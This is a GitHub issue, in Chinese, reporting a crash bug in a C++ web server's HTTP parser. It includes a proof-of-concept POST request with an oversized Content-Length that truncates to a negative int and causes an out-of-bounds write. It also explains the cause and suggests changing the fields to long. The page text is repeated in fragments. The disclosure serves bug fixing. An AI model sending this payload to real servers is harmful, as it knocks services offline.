Closed ek1ng closed 1 year ago
向server发送如下http请求
server
http
POST / HTTP/1.1 Host: 127.0.0.1:9006 User-Agent: curl/7.68.0 Accept: */* Content-Length:0221202434513 ......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
进程会crash。
crash
http_conn.h
int m_content_length;
这里将m_content_length初始化成int。
m_content_length
http_conn.cpp
m_content_length = atol(text);
在Content-Length请求头中的值比较大时,m_content_length会被当成long读进来然后转换成int,例如上面payload中的0221202434513,十六进制值为0x3380b149d1,转换成int后截断8位,为0x80b149d1,是个负数。
Content-Length
long
int
0221202434513
0x3380b149d1
0x80b149d1
http_conn::HTTP_CODE http_conn::parse_content(char *text) { if (m_read_idx >= (m_content_length + m_checked_idx)) { text[m_content_length] = '\0'; //POST请求中最后为输入的用户名和密码 m_string = text; return GET_REQUEST; } return NO_REQUEST; }
在text[m_content_length] = '\0';中m_content_length是一个比较大的负数,超出了堆空间的大小,当访问到无权限的地址时会导致crash 。
text[m_content_length] = '\0';
在http_conn.h中将m_read_idx,m_content_length,m_checked_idx初始化为long类型。
m_read_idx
m_checked_idx
这种情况是报文内容太长的场景发生的吗
POC
向
server
发送如下http
请求进程会
crash
。漏洞原理
http_conn.h
这里将
m_content_length
初始化成int。http_conn.cpp
在
Content-Length
请求头中的值比较大时,m_content_length
会被当成long
读进来然后转换成int
,例如上面payload中的0221202434513
,十六进制值为0x3380b149d1
,转换成int
后截断8位,为0x80b149d1
,是个负数。http_conn.cpp
在
text[m_content_length] = '\0';
中m_content_length
是一个比较大的负数,超出了堆空间的大小,当访问到无权限的地址时会导致crash
。修复意见
在
http_conn.h
中将m_read_idx
,m_content_length
,m_checked_idx
初始化为long类型。